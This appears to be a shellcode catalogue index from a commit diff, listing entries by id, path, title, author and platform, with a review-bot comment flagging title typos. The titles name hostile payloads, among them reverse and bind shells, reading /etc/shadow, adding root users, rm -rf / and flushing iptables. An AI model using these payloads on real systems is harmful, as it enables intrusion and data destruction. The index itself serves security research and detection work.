41750,shellcodes/linux_x86-64/41750.txt,"Linux/x86-64 - execve /bin/sh Shellcode (21 bytes)",2017-03-28,WangYihang,shellcode,linux_x86-64
41757,shellcodes/linux_x86/41757.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2017-03-29,WangYihang,shellcode,linux_x86
41827,shellcodes/windows_x86-64/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",shellcode,windows_x86-64
41883,shellcodes/linux_x86-64/41883.txt,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2)",2017-04-13,WangYihang,shellcode,linux_x86-64
41909,shellcodes/linux_x86/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,shellcode,linux_x86
41969,shellcodes/linux_x86/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,shellcode,linux_x86
41970,shellcodes/linux_x86-64/41970.asm,"Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64
41970,shellcodes/linux_x86-64/41970.asm,"Linux/x86-64 - Reverse TCP (::1:1472/TCP) Shell + IPv6 + Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,shellcode,linux_x86-64
42016,shellcodes/windows/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",shellcode,windows
42126,shellcodes/linux_x86-64/42126.c,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (1)",2017-06-05,"Touhid M.Shaikh",shellcode,linux_x86-64
42177,shellcodes/linux_x86/42177.c,"Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,shellcode,linux_x86
42179,shellcodes/linux_x86-64/42179.c,"Linux/x86-64 - execve /bin/sh Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,shellcode,linux_x86-64
42208,shellcodes/linux_x86/42208.nasm,"Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,linux_x86
42254,shellcodes/linux_x86/42254.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,linux_x86
42339,shellcodes/linux_x86-64/42339.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64
42428,shellcodes/linux_x86/42428.c,"Linux x86 - execve /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86
42485,shellcodes/linux_x86-64/42485.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.2:4444/TCP) Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64
42208,shellcodes/linux_x86/42208.nasm,"Linux/x86 - Reverse UDP (127.0.0.1:53/UDP) Shell (/bin/sh) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",shellcode,linux_x86
42254,shellcodes/linux_x86/42254.c,"Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,shellcode,linux_x86
42339,shellcodes/linux_x86-64/42339.c,"Linux/x86-64 - Reverse TCP (192.168.1.8:4444/TCP) Shell Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,shellcode,linux_x86-64
42428,shellcodes/linux_x86/42428.c,"Linux/x86 - execve /bin/sh Shellcode (24 bytes)",2017-08-06,"Touhid M.Shaikh",shellcode,linux_x86
42485,shellcodes/linux_x86-64/42485.c,"Linux/x86-64 - Reverse TCP (192.168.1.2:4444/TCP) Shell Shellcode (153 bytes)",2017-08-17,"Touhid M.Shaikh",shellcode,linux_x86-64
42522,shellcodes/linux_x86-64/42522.c,"Linux/x86-64 - Kill All Processes Shellcode (19 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
42523,shellcodes/linux_x86-64/42523.c,"Linux/x86-64 - Fork Bomb Shellcode (11 bytes)",2017-08-19,"Touhid M.Shaikh",shellcode,linux_x86-64
42594,shellcodes/linux_x86/42594.c,"Linux/x86 - Fork Bomb Shellcode (9 bytes)",2017-08-30,"Touhid M.Shaikh",shellcode,linux_x86
42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP /bin/sh Shell (192.168.0.12:4444/TCP) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
42646,shellcodes/arm/42646.c,"Linux/ARM (Raspberry Pi) - Bind TCP (4444/TCP) Shell (/bin/sh) Shellcode (192 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
42647,shellcodes/arm/42647.c,"Linux/ARM (Raspberry Pi) - Reverse TCP (192.168.0.12:4444/TCP) Shell (/bin/sh) Shellcode (160 bytes)",2017-09-10,"Andrea Sindoni",shellcode,arm
42791,shellcodes/linux_x86-64/42791.c,"Linux/x86-64 - mkdir() 'evil' Shellcode (30 bytes)",2017-09-25,"Touhid M.Shaikh",shellcode,linux_x86-64
42977,shellcodes/linux_x86/42977.c,"Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (30 bytes)",2017-10-12,"Manuel Mancera",shellcode,linux_x86
42992,shellcodes/windows_x86-64/42992.c,"Windows x64 - API Hooking Shellcode (117 bytes)",2017-10-16,"Roziul Hasan Khan Shifat",shellcode,windows_x86-64
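Review bot: The description for id 41630 in this hunk is spelled `exceve /bin/sh Encoded Shellcode`, so anyone searching the index for `execve` payloads (for example to pull samples for detection testing) will miss that row. The commit is already normalising titles around it, so the row could be corrected in the same pass to `Linux/x86 - execve /bin/sh Encoded Shellcode (44 bytes)`. The +/- markers are lost on this page, so I am assuming from its single occurrence that the row is unchanged context and not a removed line. The rendered table further down shows a similar slip, `Diassembly Obfuscation` in the title for id 13362.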

1 id file description date author type platform
2 14113 shellcodes/arm/14113.txt Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes) 2010-06-29 Jonathan Salwan shellcode arm
3 13241 shellcodes/aix/13241.c AIX - execve /bin/sh Shellcode (88 bytes) 2004-09-26 Georgi Guninski shellcode aix
4 13242 shellcodes/bsd/13242.txt BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes) BSD - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (124 bytes) 2000-11-19 Scrippie shellcode bsd
5 13243 shellcodes/bsd_ppc/13243.c BSD/PPC - execve /bin/sh Shellcode (128 bytes) 2004-09-26 Palante shellcode bsd_ppc
6 13244 shellcodes/bsd_x86/13244.c BSD/x86 - setuid(0) + execve /bin/sh Shellcode (30 bytes) 2006-07-20 Marco Ivaldi shellcode bsd_x86
7 13245 shellcodes/bsd_x86/13245.c BSD/x86 - setuid(0) + Bind TCP Shell (31337/TCP) Shellcode (94 bytes) BSD/x86 - setuid(0) + Bind TCP (31337/TCP) Shell Shellcode (94 bytes) 2006-07-20 Marco Ivaldi shellcode bsd_x86
8 13246 shellcodes/bsd_x86/13246.c BSD/x86 - execve /bin/sh Shellcode (27 bytes) 2004-09-26 n0gada shellcode bsd_x86
9 13247 shellcodes/bsd_x86/13247.c BSD/x86 - execve /bin/sh + setuid(0) Shellcode (29 bytes) 2004-09-26 Matias Sedalo shellcode bsd_x86
10 13248 shellcodes/bsd_x86/13248.c BSD/x86 - Bind TCP Shell (31337/TCP) Shellcode (83 bytes) BSD/x86 - Bind TCP (31337/TCP) Shell Shellcode (83 bytes) 2004-09-26 no1 shellcode bsd_x86
11 13249 shellcodes/bsd_x86/13249.c BSD/x86 - Bind TCP Shell (Random TCP Port) Shellcode (143 bytes) BSD/x86 - Bind TCP (Random TCP Port) Shell Shellcode (143 bytes) 2004-09-26 MayheM shellcode bsd_x86
12 13250 shellcodes/bsd_x86/13250.c BSD/x86 - Break chroot Shellcode (45 bytes) 2004-09-26 Matias Sedalo shellcode bsd_x86
13 13251 shellcodes/bsd_x86/13251.c BSD/x86 - execve /bin/sh Encoded Shellcode (49 bytes) 2004-09-26 dev0id shellcode bsd_x86
14 13252 shellcodes/bsd_x86/13252.c BSD/x86 - execve /bin/sh Encoded Shellcode (57 bytes) 2004-09-26 Matias Sedalo shellcode bsd_x86
15 13254 shellcodes/bsd_x86/13254.c BSD/x86 - Reverse TCP Shell (torootteam.host.sk:2222/TCP) Shellcode (93 bytes) BSD/x86 - Reverse TCP (torootteam.host.sk:2222/TCP) Shell Shellcode (93 bytes) 2004-09-26 dev0id shellcode bsd_x86
16 13255 shellcodes/bsd_x86/13255.c BSD/x86 - execve(/bin/cat /etc/master.passwd) | mail root@localhost Shellcode (92 bytes) 2004-09-26 Matias Sedalo shellcode bsd_x86
17 13256 shellcodes/bsd/13256.c BSD/x86 - Reverse TCP Shell (192.168.2.33:6969/TCP) Shellcode (129 bytes) BSD/x86 - Reverse TCP (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes) 2004-09-26 Sinan Eren shellcode bsd
18 13257 shellcodes/bsdi_x86/13257.txt BSDi/x86 - execve /bin/sh Shellcode (45 bytes) 2004-09-26 duke shellcode bsdi_x86
19 13258 shellcodes/bsdi_x86/13258.txt BSDi/x86 - execve /bin/sh Shellcode (46 bytes) 2004-09-26 vade79 shellcode bsdi_x86
20 13260 shellcodes/bsdi_x86/13260.c BSDi/x86 - execve /bin/sh ToUpper Encoded Shellcode (97 bytes) 2004-09-26 anonymous shellcode bsdi_x86
21 13261 shellcodes/freebsd/13261.txt FreeBSD x86 / x64 - execve /bin/sh Anti-Debugging Shellcode (140 bytes) 2009-04-13 c0d3_z3r0 shellcode freebsd
22 13262 shellcodes/freebsd_x86/13262.txt FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes) 2008-09-12 suN8Hclf shellcode freebsd_x86
23 13263 shellcodes/freebsd_x86/13263.txt FreeBSD/x86 - Reverse TCP cat /etc/passwd (192.168.1.33:8000/TCP) Shellcode (112 bytes) FreeBSD/x86 - Reverse TCP (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes) 2008-09-10 suN8Hclf shellcode freebsd_x86
24 13264 shellcodes/freebsd_x86/13264.txt FreeBSD/x86 - Kill All Processes Shellcode (12 bytes) 2008-09-09 suN8Hclf shellcode freebsd_x86
25 13265 shellcodes/freebsd_x86/13265.c FreeBSD/x86 - Reverse Connection (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes) 2008-09-05 sm4x shellcode freebsd_x86
26 13266 shellcodes/freebsd_x86/13266.asm FreeBSD/x86 - execve /bin/cat /etc/master.passwd Null-Free Shellcode (65 bytes) 2008-08-25 sm4x shellcode freebsd_x86
27 13267 shellcodes/freebsd_x86/13267.asm FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:8000/TCP) Null-Free Shellcode (89 bytes) FreeBSD/x86 - Reverse TCP (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes) 2008-08-21 sm4x shellcode freebsd_x86
28 13268 shellcodes/freebsd_x86/13268.asm FreeBSD/x86 - setuid(0) + execve(ipf -Fa) Shellcode (57 bytes) 2008-08-21 sm4x shellcode freebsd_x86
29 13269 shellcodes/freebsd_x86/13269.c FreeBSD/x86 - execve /bin/sh Encoded Shellcode (48 bytes) 2008-08-19 c0d3_z3r0 shellcode freebsd_x86
30 13270 shellcodes/freebsd_x86/13270.c FreeBSD/x86 - Bind TCP Password /bin/sh Shell (4883/TCP) Shellcode (222 bytes) FreeBSD/x86 - Bind TCP (4883/TCP) Shell (/bin/sh) + Password Shellcode (222 bytes) 2006-07-19 MahDelin shellcode freebsd_x86
31 13271 shellcodes/freebsd_x86/13271.c FreeBSD/x86 - reboot(RB_AUTOBOOT) Shellcode (7 bytes) 2006-04-19 IZ shellcode freebsd_x86
32 13272 shellcodes/freebsd_x86/13272.c FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (1) 2006-04-14 IZ shellcode freebsd_x86
33 13273 shellcodes/freebsd_x86/13273.c FreeBSD/x86 - execve /bin/sh Shellcode (23 bytes) (2) 2004-09-26 marcetam shellcode freebsd_x86
35 13275 shellcodes/freebsd_x86/13275.c FreeBSD/x86 - Load Kernel Module (/sbin/kldload /tmp/o.o) Shellcode (74 bytes) 2004-09-26 dev0id shellcode freebsd_x86
36 13276 shellcodes/freebsd_x86/13276.c FreeBSD/x86 - chown 0:0 + chmod 6755 + execve /tmp/sh Shellcode (44 bytes) 2004-09-26 Claes Nyberg shellcode freebsd_x86
37 13277 shellcodes/freebsd_x86/13277.c FreeBSD/x86 - execve /tmp/sh Shellcode (34 bytes) 2004-09-26 Claes Nyberg shellcode freebsd_x86
38 13278 shellcodes/freebsd_x86/13278.asm FreeBSD/x86 - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (102 bytes) FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes) 2004-09-26 Scrippie shellcode freebsd_x86
39 13279 shellcodes/freebsd_x86-64/13279.c FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes) 2009-05-18 Hack'n Roll shellcode freebsd_x86-64
40 13280 shellcodes/freebsd_x86-64/13280.c FreeBSD/x86-64 - execve /bin/sh Shellcode (34 bytes) 2009-05-15 c0d3_z3r0 shellcode freebsd_x86-64
41 13281 shellcodes/generator/13281.c Linux/x86 - execve Null-Free Shellcode (Generator) 2009-06-29 certaindeath shellcode generator
43 13283 shellcodes/generator/13283.php Windows XP SP1 - Bind TCP Shell Shellcode (Generator) 2009-06-09 Jonathan Salwan shellcode generator
44 13284 shellcodes/generator/13284.txt Linux - execve /bin/sh Polymorphic With Printable ASCII Characters Shellcode (Generator) 2008-08-31 sorrow shellcode generator
45 13285 shellcodes/generator/13285.c Linux/x86 - Command Generator Null-Free Shellcode (Generator) 2008-08-19 BlackLight shellcode generator
46 13286 shellcodes/generator/13286.c Windows - Reverse TCP Shell (127.0.0.1:123/TCP) Alphanumeric Shellcode (Encoder/Decoder) (Generator) Windows - Reverse TCP (127.0.0.1:123/TCP) Shell + Alphanumeric Shellcode (Encoder/Decoder) (Generator) 2008-08-04 Avri Schneider shellcode generator
47 13288 shellcodes/generator/13288.c (Generator) - HTTP/1.x Requests Shellcode (18+/26+ bytes) 2006-10-22 izik shellcode generator
48 13289 shellcodes/generator/13289.c Windows x86 - Multi-Format Encoding Tool Shellcode (Generator) 2005-12-16 Skylined shellcode generator
49 13290 shellcodes/ios/13290.txt iOS Version-independent - Null-Free Shellcode 2008-08-21 Andy Davis shellcode ios
50 13291 shellcodes/hardware/13291.txt Cisco IOS - New TTY + Privilege Level To 15 + Reverse Virtual Terminal Shell (21/TCP) Shellcode Cisco IOS - New TTY + Privilege Level To 15 + Reverse (21/TCP) Virtual Terminal Shell Shellcode 2008-08-13 Gyan Chawdhary shellcode hardware
51 13292 shellcodes/hardware/13292.txt Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes) 2008-08-13 Varun Uppal shellcode hardware
52 13293 shellcodes/hardware/13293.txt Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode 2008-08-13 Gyan Chawdhary shellcode hardware
53 13295 shellcodes/hp-ux/13295.txt HP-UX - execve /bin/sh Shellcode (58 bytes) 2004-09-26 K2 shellcode hp-ux
54 13296 shellcodes/linux_x86-64/13296.c Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (84 bytes) 2008-11-28 gat3way shellcode linux_x86-64
55 13297 shellcodes/generator/13297.c Linux/x86-64 - Reverse TCP Semi-Stealth /bin/bash Shell Shellcode (88+ bytes) (Generator) Linux/x86-64 - Reverse TCP Shell (/bin/bash) + Semi-Stealth Shellcode (88+ bytes) (Generator) 2006-04-21 phar shellcode generator
56 13298 shellcodes/linux_mips/13298.c Linux/MIPS (Linksys WRT54G/GL) - Bind TCP /bin/sh Shell (4919/TCP) Shellcode (276 bytes) Linux/MIPS (Linksys WRT54G/GL) - Bind TCP (4919/TCP) Shell (/bin/sh) Shellcode (276 bytes) 2008-08-18 vaicebine shellcode linux_mips
57 13299 shellcodes/linux_mips/13299.c Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]) Shellcode (60 bytes) 2008-08-18 vaicebine shellcode linux_mips
58 13300 shellcodes/linux_mips/13300.c Linux/MIPS (Little Endian) - execve(/bin/sh) Shellcode (56 bytes) 2005-11-09 core shellcode linux_mips
59 13301 shellcodes/linux_ppc/13301.c Linux/PPC - execve /bin/sh Shellcode (60 bytes) 2005-11-09 Charles Stevenson shellcode linux_ppc
60 13302 shellcodes/linux_ppc/13302.c Linux/PPC - read + exec Shellcode (32 bytes) 2005-11-09 Charles Stevenson shellcode linux_ppc
61 13303 shellcodes/linux_ppc/13303.c Linux/PPC - Reverse TCP /bin/sh Shell (192.168.1.1:31337/TCP) Shellcode (240 bytes) Linux/PPC - Reverse TCP (192.168.1.1:31337/TCP) Shell (/bin/sh) Shellcode (240 bytes) 2005-11-09 Charles Stevenson shellcode linux_ppc
62 13304 shellcodes/linux_ppc/13304.c Linux/PPC - execve /bin/sh Shellcode (112 bytes) 2004-09-12 Palante shellcode linux_ppc
63 13305 shellcodes/linux_sparc/13305.c Linux/SPARC - Reverse TCP Shell (192.168.100.1:2313/TCP) Shellcode (216 bytes) Linux/SPARC - Reverse TCP (192.168.100.1:2313/TCP) Shell Shellcode (216 bytes) 2004-09-26 killah shellcode linux_sparc
64 13306 shellcodes/linux_sparc/13306.c Linux/SPARC - Bind TCP Shell (8975/TCP) Null-Free Shellcode (284 bytes) Linux/SPARC - Bind TCP (8975/TCP) Shell + Null-Free Shellcode (284 bytes) 2004-09-12 killah shellcode linux_sparc
65 13307 shellcodes/linux_x86/13307.c Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes) 2009-09-15 XenoMuta shellcode linux_x86
66 13308 shellcodes/linux_x86/13308.c Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes) 2009-09-15 XenoMuta shellcode linux_x86
67 13309 shellcodes/linux_x86/13309.asm Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes) 2009-09-09 XenoMuta shellcode linux_x86
68 13310 shellcodes/linux_x86/13310.c Linux/x86 - Disable Network Card Polymorphic Shellcode (75 bytes) 2009-08-26 Jonathan Salwan shellcode linux_x86
69 13311 shellcodes/linux_x86/13311.c Linux/x86 - killall5 Polymorphic Shellcode (61 bytes) 2009-08-11 Jonathan Salwan shellcode linux_x86
70 13312 shellcodes/linux_x86/13312.c Linux/x86 - execve /bin/sh Polymorphic Shellcode (48 bytes) 2009-08-11 Jonathan Salwan shellcode linux_x86
71 13313 shellcodes/linux_x86/13313.c Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) XOR Encoded Shellcode (152 bytes) Linux/x86 - Bind TCP (4444/TCP) Shell (/bin/sh) + XOR Encoded Shellcode (152 bytes) 2009-07-10 Rick shellcode linux_x86
72 13314 shellcodes/linux_x86/13314.c Linux/x86 - reboot() Polymorphic Shellcode (57 bytes) 2009-06-29 Jonathan Salwan shellcode linux_x86
73 13315 shellcodes/linux_x86/13315.c Linux/x86 - chmod 666 /etc/shadow Polymorphic Shellcode (54 bytes) 2009-06-22 Jonathan Salwan shellcode linux_x86
74 13316 shellcodes/linux_x86/13316.c Linux/x86 - setreuid(geteuid()_ geteuid()) + execve(_/bin/sh__0_0) Shellcode (34 bytes) 2009-06-16 blue9057 shellcode linux_x86
75 13317 shellcodes/linux_x86/13317.s Linux/x86 - Bind TCP Shell (8000/TCP) + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes) Linux/x86 - Bind TCP (8000/TCP) Shell + Flush IPTables Rules (/sbin/iptables -F) Shellcode (176 bytes) 2009-06-08 Jonathan Salwan shellcode linux_x86
76 13318 shellcodes/linux_x86/13318.s Linux/x86 - Bind TCP Shell (8000/TCP) + Add Root User Shellcode (225+ bytes) Linux/x86 - Bind TCP (8000/TCP) Shell + Add Root User Shellcode (225+ bytes) 2009-06-08 Jonathan Salwan shellcode linux_x86
77 13319 shellcodes/linux_x86/13319.s Linux/x86 - Bind TCP /bin/sh Shell (8000/TCP) Shellcode (179 bytes) Linux/x86 - Bind TCP (8000/TCP) Shell (/bin/sh) Shellcode (179 bytes) 2009-06-01 Jonathan Salwan shellcode linux_x86
78 13320 shellcodes/linux_x86-64/13320.c Linux/x86-64 - setuid(0) + execve(/bin/sh) Shellcode (49 bytes) 2009-05-14 evil.xi4oyu shellcode linux_x86-64
79 13321 shellcodes/linux_x86/13321.c Linux/x86 - Serial Port Shell Binding (/dev/ttyS0) + busybox Launching Null-Free Shellcode (82 bytes) 2009-04-30 phar shellcode linux_x86
80 13322 shellcodes/linux_x86/13322.c Linux/x86 - File Unlinker Shellcode (18+ bytes) 2009-03-03 darkjoker shellcode linux_x86
94 13336 shellcodes/linux_x86/13336.c Linux/x86 - System Beep Shellcode (45 bytes) 2008-09-09 Thomas Rinsma shellcode linux_x86
95 13337 shellcodes/linux_x86/13337.c Linux/x86 - Reverse Connection (140.115.53.35:9999/TCP) + Download A File (cb) + Execute Shellcode (149 bytes) 2008-08-25 militan shellcode linux_x86
96 13338 shellcodes/linux_x86/13338.c Linux/x86 - setreuid(geteuid_ geteuid) + execve(/bin/sh) Shellcode (39 bytes) 2008-08-19 Reth shellcode linux_x86
97 13339 shellcodes/linux_x86/13339.asm Linux/x86 - Reverse TCP cat /etc/shadow (8192/TCP) Shellcode (155 bytes) Linux/x86 - Reverse TCP (8192/TCP) cat /etc/shadow Shellcode (155 bytes) 2008-08-18 0in shellcode linux_x86
98 13340 shellcodes/linux_x86/13340.c Linux/x86 - Reverse PHP (Writes to /var/www/cb.php On The Filesystem) Shell Shellcode (508 bytes) 2008-08-18 GS2008 shellcode linux_x86
99 13341 shellcodes/linux_x86/13341.c Linux/x86 - /bin/rm -rf / + Attempts To Block The Process From Being Stopped Shellcode (132 bytes) 2008-08-18 onionring shellcode linux_x86
100 13342 shellcodes/linux_x86/13342.c Linux/x86 - setuid(0) + setgid(0) + aslr_off (Disable ASLR Security) Shellcode (79 bytes) 2008-08-18 LiquidWorm shellcode linux_x86
101 13343 shellcodes/linux_x86/13343.asm Linux/x86 - Raw-Socket ICMP/Checksum /bin/sh Shell Shellcode (235 bytes) Linux/x86 - Raw-Socket ICMP/Checksum Shell (/bin/sh) Shellcode (235 bytes) 2007-04-02 mu-b shellcode linux_x86
102 13344 shellcodes/linux_x86/13344.c Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes) 2007-03-09 Kris Katterjohn shellcode linux_x86
103 13345 shellcodes/linux_x86/13345.c Linux/x86 - Kill All Processes Shellcode (11 bytes) 2007-03-09 Kris Katterjohn shellcode linux_x86
104 13346 shellcodes/linux_x86/13346.s Linux/x86 - execve read Shellcode (92 bytes) 2006-11-20 0ut0fbound shellcode linux_x86
115 13357 shellcodes/linux_x86/13357.c Linux/x86 - stdin re-open + /bin/sh exec Shellcode (39 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
116 13358 shellcodes/linux_x86/13358.c Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
117 13359 shellcodes/linux_x86/13359.c Linux/x86 - setuid(0) + /bin/sh execve() Shellcode (30 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
118 13360 shellcodes/linux_x86/13360.c Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + setuid Shellcode (96 bytes) Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + setuid Shellcode (96 bytes) 2006-07-20 Marco Ivaldi shellcode linux_x86
119 13361 shellcodes/linux_x86/13361.c Linux/x86 - Bind TCP Shell (2707/TCP) Shellcode (84 bytes) Linux/x86 - Bind TCP (2707/TCP) Shell Shellcode (84 bytes) 2006-07-04 oveRet shellcode linux_x86
120 13362 shellcodes/linux_x86/13362.c Linux/x86 - execve Diassembly Obfuscation Shellcode (32 bytes) 2006-05-14 BaCkSpAcE shellcode linux_x86
121 13363 shellcodes/linux_x86/13363.c Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (100 bytes) Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (100 bytes) 2006-05-08 Benjamin Orozco shellcode linux_x86
122 13364 shellcodes/generator/13364.c Linux/x86 - Reverse TCP /bin/sh Shell (192.168.13.22:31337/TCP) Shellcode (82 bytes) (Generator) Linux/x86 - Reverse TCP (192.168.13.22:31337/TCP) Shell (/bin/sh) Shellcode (82 bytes) (Generator) 2006-05-08 Benjamin Orozco shellcode generator
123 13365 shellcodes/linux_x86/13365.c Linux/x86 - execve /bin/sh Shellcode (24 bytes) (2) 2006-05-01 hophet shellcode linux_x86
124 13366 shellcodes/linux_x86/13366.txt Linux/x86 - Reverse TCP Shell (127.0.0.1:80/TCP) XOR Encoded Shellcode (371 bytes) Linux/x86 - Reverse TCP (127.0.0.1:80/TCP) Shell + XOR Encoded Shellcode (371 bytes) 2006-04-18 xort shellcode linux_x86
125 13367 shellcodes/linux_x86/13367.c Linux/x86 - execve /bin/sh + '.ZIP' Header Shellcode (28 bytes) 2006-04-17 izik shellcode linux_x86
126 13368 shellcodes/linux_x86/13368.c Linux/x86 - execve /bin/sh + '.RTF' Header Shellcode (30 bytes) 2006-04-17 izik shellcode linux_x86
127 13369 shellcodes/linux_x86/13369.c Linux/x86 - execve /bin/sh + '.RIFF' Header Shellcode (28 bytes) 2006-04-17 izik shellcode linux_x86
128 13370 shellcodes/linux_x86/13370.c Linux/x86 - execve /bin/sh + '.BMP' Bitmap Header Shellcode (27 bytes) 2006-04-17 izik shellcode linux_x86
129 13371 shellcodes/linux_x86/13371.c Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes) 2006-04-16 Gotfault Security shellcode linux_x86
130 13372 shellcodes/linux_x86/13372.c Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes) 2006-04-16 Gotfault Security shellcode linux_x86
131 13373 shellcodes/linux_x86/13373.c Linux/x86 - Bind TCP /bin/sh Password (gotfault) Shell (64713/TCP) Shellcode (166 bytes) Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) + Password (gotfault) Shellcode (166 bytes) 2006-04-06 Gotfault Security shellcode linux_x86
132 13374 shellcodes/linux_x86/13374.c Linux/x86 - Bind TCP /bin/sh Shell (64713/TCP) Shellcode (86 bytes) Linux/x86 - Bind TCP (64713/TCP) Shell (/bin/sh) Shellcode (86 bytes) 2006-04-06 Gotfault Security shellcode linux_x86
133 13375 shellcodes/linux_x86/13375.c Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (25 bytes) 2006-04-03 Gotfault Security shellcode linux_x86
134 13376 shellcodes/linux_x86/13376.c Linux/x86 - execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (23 bytes) 2006-04-03 Gotfault Security shellcode linux_x86
135 13377 shellcodes/linux_x86/13377.c Linux/x86 - setuid(0) + execve(_/bin/sh__ [_/bin/sh__ NULL]) Shellcode (31 bytes) 2006-04-03 Gotfault Security shellcode linux_x86
142 13384 shellcodes/linux_x86/13384.c Linux/x86 - execve /bin/sh Shellcode +1 Encoded (39 bytes) 2006-01-25 izik shellcode linux_x86
143 13385 shellcodes/linux_x86/13385.c Linux/x86 - Add Root User (xtz) To /etc/passwd Shellcode (59 bytes) 2006-01-21 izik shellcode linux_x86
144 13386 shellcodes/linux_x86/13386.c Linux/x86 - Anti-Debug Trick (INT 3h trap) + execve /bin/sh Shellcode (39 bytes) 2006-01-21 izik shellcode linux_x86
145 13387 shellcodes/linux_x86/13387.c Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) Shellcode (80 bytes) Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) Shellcode (80 bytes) 2006-01-21 izik shellcode linux_x86
146 13388 shellcodes/linux_x86/13388.c Linux/x86 - Bind TCP /bin/sh Shell (31337/TCP) + fork() Shellcode (98 bytes) Linux/x86 - Bind TCP (31337/TCP) Shell (/bin/sh) + fork() Shellcode (98 bytes) 2006-01-21 izik shellcode linux_x86
147 13389 shellcodes/linux_x86/13389.c Linux/x86 - Open CD-Rom Loop 24/7 (Follows /dev/cdrom Symlink) Shellcode (39 bytes) 2006-01-21 izik shellcode linux_x86
148 13390 shellcodes/linux_x86/13390.c Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes) 2006-01-21 izik shellcode linux_x86
149 13391 shellcodes/linux_x86/13391.c Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes) 2006-01-21 izik shellcode linux_x86
150 13392 shellcodes/linux_x86/13392.c Linux/x86 - chmod 0666 /etc/shadow + exit() Shellcode (32 bytes) 2006-01-21 izik shellcode linux_x86
